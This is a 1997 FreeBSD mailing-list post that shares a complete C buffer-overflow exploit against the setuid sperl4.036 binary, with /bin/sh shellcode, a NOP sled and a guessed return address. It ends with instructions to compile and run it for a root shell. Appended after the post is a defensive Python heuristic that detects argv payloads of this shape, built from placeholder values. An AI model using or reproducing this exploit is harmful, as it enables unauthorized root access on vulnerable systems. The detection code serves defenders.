Date:      Mon, 4 Aug 1997 10:12:18 +0000 (GMT)
From:      "Lenzi, Sergio" <lenzi@bsi.com.br>
To:        hackers@freebsd.org
Subject:   Security hole script.
Message-ID:  <Pine.BSF.3.96.970804100920.6279A-100000@sergio>



Hello all.

Here is the "script" that opens a hole in our FreeBSD 2.2.2...

From a friend of mine (lgarcia@netlan.com.br):
---------------------------cut-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

/* Returns the current stack pointer: the value is left in %eax, so there is
   no explicit return statement (relies on the i386 calling convention). */
char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

int main(int argc, char *argv[])
{
        int i;
        /* i386 FreeBSD shellcode that execs /bin/sh */
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        /* fill the whole argument with a guessed address below the current stack */
        for(i=0+1;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        /* overwrite the first part with a NOP sled, then place the shellcode */
        memset(buf,0x90,768+1);
        memcpy(&buf[768+1],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        /* hand the oversized argument to the setuid perl binary */
        execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
        return 0;
}

---------------------------------------------------------cut---------

Install this script, do a make and run it.

Should return a root shell.


Sergio Lenzi.

Unix consult.
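As an added example (not part of this post and not FreeBSD or perl code), a Python heuristic a defender could run over a process's argv, for instance from an exec audit hook, to flag the payload shape the script above builds: an oversized single argument, a long run of 0x90 NOP bytes, one 4-byte value repeated across the buffer, and an embedded /bin/sh string. The sample argument is constructed here to mirror the posted layout; the address value and the 0xCC stub standing in for shellcode are placeholders. The thresholds (1024 bytes, 32-byte sled, 25% repetition) are assumptions to tune per environment.

```python
from collections import Counter

def longest_run(data: bytes, value: int) -> int:
    """Longest run of one byte value; a long 0x90 run is a NOP sled."""
    best = run = 0
    for b in data:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best

def repeated_word_fraction(data: bytes, width: int = 4) -> float:
    """Share of aligned width-byte words taken by the most common one. Words
    made of a single repeated byte (fills such as a NOP sled) are ignored, so
    only a repeated multi-byte value, e.g. a guessed return address, counts."""
    words = [data[i:i + width] for i in range(0, len(data) - width + 1, width)]
    words = [w for w in words if len(set(w)) > 1]
    if len(words) < 16:  # too short to judge
        return 0.0
    return Counter(words).most_common(1)[0][1] / len(words)

def score_argument(arg: bytes) -> dict:
    """Indicators of a stack-smashing payload carried in one argv string."""
    findings = {}
    if len(arg) >= 1024:
        findings["oversized"] = len(arg)
    sled = longest_run(arg, 0x90)
    if sled >= 32:
        findings["nop_sled"] = sled
    frac = repeated_word_fraction(arg)
    if frac >= 0.25:
        findings["repeated_pointer"] = round(frac, 2)
    if b"/bin/sh" in arg:
        findings["shell_string"] = True
    return findings

def suspicious_args(argv: list) -> list:
    """Indices of argv entries that show at least two indicators."""
    return [i for i, a in enumerate(argv) if len(score_argument(a)) >= 2]

def constructed_payload() -> bytes:
    """Constructed sample mirroring the posted layout: a repeated placeholder
    address, a 769-byte NOP sled, a 0xCC stub in place of shellcode, /bin/sh."""
    addr = (0x11223344).to_bytes(4, "little")  # placeholder, not a real address
    buf = bytearray(addr * (1400 // 4))
    buf[:769] = b"\x90" * 769
    stub = b"\xcc" * 40 + b"/bin/sh"
    buf[769:769 + len(stub)] = stub
    return bytes(buf[:1399])  # an argv string ends at its terminating NUL
```

A long but uniform argument (for example 2000 bytes of "A") trips only the size check and is not reported, which keeps the rule from firing on ordinary oversized input.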